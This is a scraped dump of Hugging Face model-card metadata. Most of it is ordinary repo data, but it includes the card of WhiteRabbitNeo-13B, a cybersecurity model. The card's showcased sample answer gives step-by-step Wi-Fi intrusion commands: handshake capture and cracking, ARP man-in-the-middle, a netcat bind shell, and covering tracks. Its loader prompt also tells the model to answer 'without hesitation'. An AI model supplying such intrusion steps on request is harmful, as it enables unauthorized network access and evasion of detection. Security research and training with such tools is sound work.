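These checkpoints are consumed by the ComfyUI wrapper's nodes rather than by Python code; still, a hedged sketch of how to fetch and inspect one of the safetensors files is shown below (the filename is one of the files in this repo; pick whichever variant you need):

```python
# Hedged sketch: download one checkpoint from this repo and list its tensors.
# The ComfyUI wrapper linked above is the intended consumer of these files.
from huggingface_hub import hf_hub_download
from safetensors import safe_open

path = hf_hub_download('Kijai/WanVideo_comfy', 'Wan2_1_VAE_bf16.safetensors')
with safe_open(path, framework='pt') as f:
    print(f'{len(f.keys())} tensors in', path)
```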
TinyVAE from https://github.com/madebyollin/taehv","{""id"": ""Kijai/WanVideo_comfy"", ""author"": ""Kijai"", ""sha"": ""91e0f1c593de574e8d4e10f1639dc1d6acc5bf73"", ""last_modified"": ""2025-04-25 13:12:20+00:00"", ""created_at"": ""2025-02-25 17:54:17+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 466, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": null, ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Phantom-Wan-1_3B_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Phantom-Wan-1_3B_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-540P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-540P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-720P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-14B-720P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-DF-1_3B-540P_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-540P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-540P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-540P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-720P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-I2V-14B-720P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-540P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-540P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-720P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1-SkyReels-V2-T2V-14B-720P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Skyreels/Wan2_1_SkyreelsA2_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='UniAnimate-Wan2.1-14B-Lora-12000-fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2.1-Fun-Control-14B_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='Wan2.1-Fun-Control-14B_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2.1-Fun-InP-14B_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2.1-Fun-InP-14B_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-FLF2V-14B-720P_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-FLF2V-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-Fun-V1_1-14B-Control_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-I2V-14B-480P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-I2V-14B-480P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-I2V-14B-720P_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-I2V-14B-720P_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-14B_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-14B_fp8_e5m2.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-1_3B_bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-1_3B_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1-T2V-1_3B_fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1_VACE_1_3B_preview_bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1_VAE_bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1_VAE_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Wan2_1_kwai_recammaster_1_3B_step20000_bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='open-clip-xlm-roberta-large-vit-huge-14_visual_fp16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='open-clip-xlm-roberta-large-vit-huge-14_visual_fp32.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='taew2_1.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='umt5-xxl-enc-bf16.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='umt5-xxl-enc-fp8_e4m3fn.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-25 13:12:20+00:00"", ""cardData"": null, ""transformersInfo"": null, ""_id"": ""67be03c930eecba21c83a91e"", ""modelId"": ""Kijai/WanVideo_comfy"", ""usedStorage"": 711711251796}",0,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Kijai/WanVideo_comfy&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BKijai%2FWanVideo_comfy%5D(%2FKijai%2FWanVideo_comfy)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1

WhiteRabbitNeo-13B-v1_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
@@ -0,0 +1,522 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
WhiteRabbitNeo/WhiteRabbitNeo-13B-v1,"---
license: llama2
---

# Our 33B model is now in beta!
Access at: https://www.whiterabbitneo.com/

# Our Discord Server
Join us at: https://discord.gg/8Ynkrcbk92 (Updated on Dec 29th. Now a permanent link to join)

# LLaMA-2 Licence + WhiteRabbitNeo Extended Version

# Licence: Usage Restrictions

```
You agree not to use the Model or Derivatives of the Model:

- In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
- For military use in any way;
- For the purpose of exploiting, harming or attempting to exploit or harm minors in any way;
- To generate or disseminate verifiably false information and/or content with the purpose of harming others;
- To generate or disseminate inappropriate content subject to applicable regulatory requirements;
- To generate or disseminate personal identifiable information without due authorization or for unreasonable use;
- To defame, disparage or otherwise harass others;
- For fully automated decision making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
- For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
- To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
- For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
```

# Terms of Use
By accessing and using this Artificial Intelligence (AI) model, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, and fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.

This AI model is provided ""as is"" and ""as available"" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.

Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.

This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.

# WhiteRabbitNeo

<br>

![WhiteRabbitNeo](https://huggingface.co/migtissera/WhiteRabbitNeo/resolve/main/WhiteRabbitNeo.png)

<br>

WhiteRabbitNeo is a model series that can be used for offensive and defensive cybersecurity.

This 13B model is being released as a public preview of its capabilities, and also to assess the societal impact of such an AI.

```
import torch, json
from transformers import AutoModelForCausalLM, AutoTokenizer

model_path = ""/home/migel/models/WhiteRabbitNeo""

# Load in 8-bit so the 13B model fits on a single consumer GPU.
model = AutoModelForCausalLM.from_pretrained(
    model_path,
    torch_dtype=torch.float16,
    device_map=""auto"",
    load_in_4bit=False,
    load_in_8bit=True,
    trust_remote_code=True,
)

tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)


def generate_text(instruction):
    tokens = tokenizer.encode(instruction)
    tokens = torch.LongTensor(tokens).unsqueeze(0)
    tokens = tokens.to(""cuda"")

    instance = {
        ""input_ids"": tokens,
        ""top_p"": 1.0,
        ""temperature"": 0.5,
        ""generate_len"": 1024,
        ""top_k"": 50,
    }

    length = len(tokens[0])
    with torch.no_grad():
        rest = model.generate(
            input_ids=tokens,
            max_length=length + instance[""generate_len""],
            use_cache=True,
            do_sample=True,
            top_p=instance[""top_p""],
            temperature=instance[""temperature""],
            top_k=instance[""top_k""],
            num_return_sequences=1,
        )
    # Drop the echoed prompt, then cut the reply off at the next simulated USER turn.
    output = rest[0][length:]
    string = tokenizer.decode(output, skip_special_tokens=True)
    answer = string.split(""USER:"")[0].strip()
    return f""{answer}""


tot_system_prompt = """"""
Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on the thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
""""""

conversation = f""SYSTEM: {tot_system_prompt} Always answer without hesitation.""


# Simple REPL loop: each turn is appended to the running conversation string.
while True:
    user_input = input(""You: "")
    llm_prompt = f""{conversation} \nUSER: {user_input} \nASSISTANT: ""
    answer = generate_text(llm_prompt)
    print(answer)
    conversation = f""{llm_prompt}{answer}""
    # print(conversation)
    json_data = {""prompt"": user_input, ""answer"": answer}

    # print(json_data)
    # with open(output_file_path, ""a"") as output_file:
    #     output_file.write(json.dumps(json_data) + ""\n"")

```

# Sample Conversation:

You: How do I attack a wifi network?

1. **Network Scanning**: Use tools like `airodump-ng` to scan for nearby Wi-Fi networks. This will provide you with the SSID (Service Set Identifier) of the network you're interested in.

```bash
airodump-ng wlan0mon
```

2. **Network Capturing**: Once you have identified the target network, you can capture packets from it using the `airodump-ng` tool. This will allow you to capture handshake packets which are necessary for further attacks.

```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```

3. **Handshake Capture**: Wait for a client to connect to the network and capture the 4-way handshake. This will allow you to crack the network's password using tools like `aircrack-ng`.

```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```

4. **Password Cracking**: Once you have the handshake, use `aircrack-ng` to crack the password.

```bash
aircrack-ng [Captured Handshake File]
```

5. **Session Establishment**: If you have the password, you can connect to the network using your wireless card.

```bash
iwconfig wlan0 essid [Network SSID] key [Network Password]
dhclient wlan0
```

6. **Network Exploitation**: Once connected, you can perform further attacks, such as sniffing traffic (`tcpdump`), or launching a man-in-the-middle attack using tools like `ettercap` or `arpspoof`.

```bash
tcpdump -i wlan0 -w [Packet Capture File]
ettercap -T -i [Interface] -M arp [Target IP]
```

7. **Post-Exploitation**: After gaining access to the network, you can exfiltrate data, execute commands, or perform other malicious activities.

```bash
nc -lvp [Local Port] -e /bin/bash
```

8. **Cleanup**: Remember to clean up any traces of your activities to avoid detection and legal consequences.

```bash
airmon-ng stop wlan0mon
```

Please note that all these steps should be performed in a legal and ethical manner, and only on networks you have permission to test. Unauthorized access to computer networks is illegal and unethical.


","{""id"": ""WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""author"": ""WhiteRabbitNeo"", ""sha"": ""5ecae8d533223436512e31edc3f56bced00265f1"", ""last_modified"": ""2024-02-15 17:03:54+00:00"", ""created_at"": ""2023-12-17 16:26:55+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 539, ""downloads_all_time"": null, ""likes"": 420, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""llama"", ""text-generation"", ""custom_code"", ""license:llama2"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: llama2"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_llama.LlamaConfig"", ""AutoModel"": ""modeling_llama.LlamaModel"", ""AutoModelForCausalLM"": ""modeling_llama.LlamaForCausalLM"", ""AutoModelForSequenceClassification"": ""modeling_llama.LlamaForSequenceClassification""}, ""model_type"": ""llama"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": true}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='WhiteRabbitNeo.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_llama.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_llama.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00001-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00002-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00003-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00004-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00005-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00006-of-00006.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""REDDNoC/whiterabbitneo-WhiteRabbitNeo-13B"", ""NexusInstruments/BlackHatRabbitNeo-13B-v1"", ""AdinEnvironment/whiterabbitneo-WhiteRabbitNeo-13B"", ""AdinEnvironment/WhiteRabbitNeo-Hacker-Chat"", ""holytinz278/MicroAi"", ""ototao/whiterabbitneo-WhiteRabbitNeo-13B"", 
""shashithej/whiterabbitneo-WhiteRabbitNeo-13B"", ""Betacuckgpt/whiterabbitneo-WhiteRabbitNeo-13B"", ""ZENLLC/whiterabbitneo-WhiteRabbitNeo-13B"", ""Matinmollapur01/matinmollapur-WhiteRabbitNeo-13B"", ""AVHug/whiterabbitneo-WhiteRabbitNeo-13B"", ""Kiadee/neurolattice-WhiteRabbitNeo-13B-v1"", ""emilalvaro/neurolattice-WhiteRabbitNeo-13B-v1"", ""Kiadee/WhiteRabbitNeo-13B-v1"", ""sejamenath2023/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""FGF897/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""david6966/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""sandy123sss/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""Leroy0293/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""sudoshellz/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""procodec/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""Facemaker/Hakingpt"", ""hiraetch72/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""SunX45/NeoRabbitNeo"", ""bear222/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1"", ""KazekageGARRA01/whiterabbitneo-WhiteRabbitNeo-13B"", ""holytinz278/Microais""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-02-15 17:03:54+00:00"", ""cardData"": ""license: llama2"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""657f214f504da7f6f3e9641e"", ""modelId"": ""WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""usedStorage"": 52066287694}",0,"https://huggingface.co/Canstralian/text2shellcommands, https://huggingface.co/PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed",2,,0,"https://huggingface.co/TheBloke/WhiteRabbitNeo-13B-GGUF, https://huggingface.co/TheBloke/WhiteRabbitNeo-13B-GPTQ, https://huggingface.co/TheBloke/WhiteRabbitNeo-13B-AWQ, https://huggingface.co/MaziyarPanahi/WhiteRabbitNeo-13B-v1-GGUF, https://huggingface.co/mradermacher/WhiteRabbitNeo-13B-v1-GGUF, https://huggingface.co/mradermacher/WhiteRabbitNeo-13B-v1-i1-GGUF, https://huggingface.co/mradermacher/WhiteRabbitNeo-13B-GGUF, https://huggingface.co/mradermacher/WhiteRabbitNeo-13B-i1-GGUF, https://huggingface.co/wolflycanorcant/WhiteRabbitNeo-13B-v1-Q4_K_M-GGUF, https://huggingface.co/shinigami92g/WhiteRabbitNeo-13B-v1-Q4_0-GGUF",10,,0,"AVHug/whiterabbitneo-WhiteRabbitNeo-13B, AdinEnvironment/WhiteRabbitNeo-Hacker-Chat, AdinEnvironment/whiterabbitneo-WhiteRabbitNeo-13B, Betacuckgpt/whiterabbitneo-WhiteRabbitNeo-13B, Kiadee/neurolattice-WhiteRabbitNeo-13B-v1, Matinmollapur01/matinmollapur-WhiteRabbitNeo-13B, NexusInstruments/BlackHatRabbitNeo-13B-v1, REDDNoC/whiterabbitneo-WhiteRabbitNeo-13B, ZENLLC/whiterabbitneo-WhiteRabbitNeo-13B, holytinz278/MicroAi, huggingface/InferenceSupport/discussions/new?title=WhiteRabbitNeo/WhiteRabbitNeo-13B-v1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BWhiteRabbitNeo%2FWhiteRabbitNeo-13B-v1%5D(%2FWhiteRabbitNeo%2FWhiteRabbitNeo-13B-v1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, ototao/whiterabbitneo-WhiteRabbitNeo-13B, shashithej/whiterabbitneo-WhiteRabbitNeo-13B",13
Canstralian/text2shellcommands,"---
license: mit
datasets:
- Canstralian/ShellCommands
- Canstralian/CyberExploitDB
language:
- en
base_model:
- WhiteRabbitNeo/WhiteRabbitNeo-13B-v1
- replit/replit-code-v1_5-3b
library_name: transformers
tags:
- code

---

# Model Card for Model ID

This model card aims to document the capabilities, performance, and intended usage of models fine-tuned for cybersecurity tasks, including shell command parsing and cyber exploit detection. It is based on the underlying models WhiteRabbitNeo-13B-v1 and replit-code-v1_5-3b, fine-tuned on datasets related to shell commands and exploit databases.

## Model Details

### Model Description
This model is a fine-tuned version of large-scale language models optimized for tasks such as parsing shell commands and analyzing cybersecurity exploits. The training leverages datasets such as Canstralian/ShellCommands and Canstralian/CyberExploitDB to provide domain-specific knowledge.

**Developed by**: Canstralian
**Model type**: Transformer-based Language Model for cybersecurity applications
**Language(s) (NLP)**: English (en)
**License**: MIT
**Finetuned from model**: WhiteRabbitNeo/WhiteRabbitNeo-13B-v1, replit/replit-code-v1_5-3b

### Uses

#### Direct Use
The model is intended to be used directly for tasks such as:
- Shell command understanding and classification
- Analyzing and classifying cybersecurity exploit patterns
- Assisting with code generation and debugging in a cybersecurity context

#### Downstream Use
When fine-tuned further, the model can be applied to:
- Automated incident response systems
- Security tool integration (e.g., for vulnerability scanners)
- Custom cybersecurity solutions tailored to enterprise needs

#### Out-of-Scope Use
The model is not designed for general-purpose natural language understanding outside of its specified cybersecurity domain. It may perform poorly or inaccurately for tasks other than:
- Shell command parsing
- Exploit database analysis
- Code generation for cybersecurity applications

### Bias, Risks, and Limitations
This model may exhibit bias in the detection of certain exploits or shell commands, particularly if it encounters unfamiliar patterns not covered in the training data. Additionally, the model's predictions may be less accurate on unseen datasets or on edge cases that were not represented in the training data.

### Recommendations
- Users should be cautious when applying the model to novel or unverified exploits, as it may not handle new attack vectors well.
- Regular evaluation and testing in real-world environments are recommended before deploying the model in production.

### How to Get Started with the Model
Use the code below to get started with the model:

```python
from transformers import pipeline

# Load the pre-trained model
model_name = ""Canstralian/WhiteRabbitNeo-13B-v1-finetuned""
nlp = pipeline(""text-classification"", model=model_name)

# Example usage
result = nlp(""Example shell command or exploit input"")
print(result)
```

## Training Details
### Training Data
The model was fine-tuned on the following datasets:

- Canstralian/ShellCommands: A collection of shell commands used in cybersecurity contexts.
- Canstralian/CyberExploitDB: A curated set of known exploits and vulnerabilities.

Further details on the preprocessing of these datasets can be found in their respective dataset cards.

## Training Procedure
### Preprocessing
The data was preprocessed to remove any sensitive or personally identifiable information. Text normalization and tokenization were applied to ensure consistency across the datasets.
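To make the preprocessing step concrete, here is a minimal sketch of what such a pipeline could look like. The card does not publish the actual normalization rules, so `normalize_command` and its masking patterns are illustrative assumptions, not the real implementation:

```python
import re
from transformers import AutoTokenizer

def normalize_command(command: str) -> str:
    # Illustrative assumptions, not the card's actual rules:
    # trim and collapse whitespace, then mask credential-like values.
    command = re.sub(r""\s+"", "" "", command.strip())
    command = re.sub(r""(--password[= ])\S+"", r""\1<MASKED>"", command)
    return command

# Tokenize with the base model's tokenizer for consistency across datasets.
tokenizer = AutoTokenizer.from_pretrained(""WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"")
ids = tokenizer(normalize_command(""nmap  -sV --password=hunter2 10.0.0.5""))[""input_ids""]
print(ids[:8])
```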
### Training Hyperparameters
Training regime: fp16 mixed precision
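For orientation, fp16 mixed precision is typically switched on through `TrainingArguments` in the transformers `Trainer` stack. A minimal sketch follows; every value except `fp16=True` is an assumed placeholder rather than the card's actual setting:

```python
from transformers import TrainingArguments

# Only fp16=True reflects the documented training regime;
# all other values are illustrative placeholders.
training_args = TrainingArguments(
    output_dir=""./text2shellcommands-out"",  # placeholder path
    per_device_train_batch_size=4,           # assumed
    num_train_epochs=3,                      # assumed
    fp16=True,                               # fp16 mixed precision
)
# Pass training_args to a Trainer along with the model and datasets.
```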

## Evaluation

### Testing Data, Factors & Metrics
Testing was performed on both synthetic and real-world shell command and exploit datasets, focusing on the model's ability to correctly parse shell commands and identify exploit signatures.

### Factors
The evaluation factors included:

- Model performance across different types of shell commands and exploits.
- Accuracy, precision, recall, and F1-score in detecting known exploits.

### Metrics
Metrics used for evaluation include (a short computation sketch follows the list):

- Accuracy: the percentage of correct predictions made by the model.
- Precision: the fraction of retrieved instances that are relevant.
- Recall: the fraction of relevant instances that are retrieved.
- F1-score: the harmonic mean of precision and recall.
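As a quick worked example of how these four metrics relate, here is a minimal sketch with made-up labels (1 = exploit, 0 = benign); the numbers are illustrative only:

```python
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score

# Toy labels for illustration only: 1 = exploit, 0 = benign.
y_true = [1, 0, 1, 1, 0, 1, 0, 0]
y_pred = [1, 0, 0, 1, 0, 1, 1, 0]

print(""accuracy: "", accuracy_score(y_true, y_pred))   # 6/8 = 0.75
print(""precision:"", precision_score(y_true, y_pred))  # 3/4 = 0.75
print(""recall:   "", recall_score(y_true, y_pred))     # 3/4 = 0.75
print(""f1:       "", f1_score(y_true, y_pred))         # 0.75
```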
## Results
The model performs well on standard shell command parsing tasks and exploit detection, with high accuracy for common exploits. However, its performance may degrade on newer or less common exploits.

## Summary
The model is well-suited for cybersecurity applications involving shell command and exploit detection. While it excels in these areas, users should monitor its performance for emerging threats and unusual attack patterns.
","{""id"": ""Canstralian/text2shellcommands"", ""author"": ""Canstralian"", ""sha"": ""960f3f15d5853777ba4592da7361e8bee95b21a8"", ""last_modified"": ""2025-01-01 01:35:47+00:00"", ""created_at"": ""2024-11-30 20:47:21+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 1, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""code"", ""en"", ""dataset:Canstralian/ShellCommands"", ""dataset:Canstralian/CyberExploitDB"", ""base_model:WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""base_model:finetune:WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""license:mit"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- WhiteRabbitNeo/WhiteRabbitNeo-13B-v1\n- replit/replit-code-v1_5-3b\ndatasets:\n- Canstralian/ShellCommands\n- Canstralian/CyberExploitDB\nlanguage:\n- en\nlibrary_name: transformers\nlicense: mit\ntags:\n- code"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", 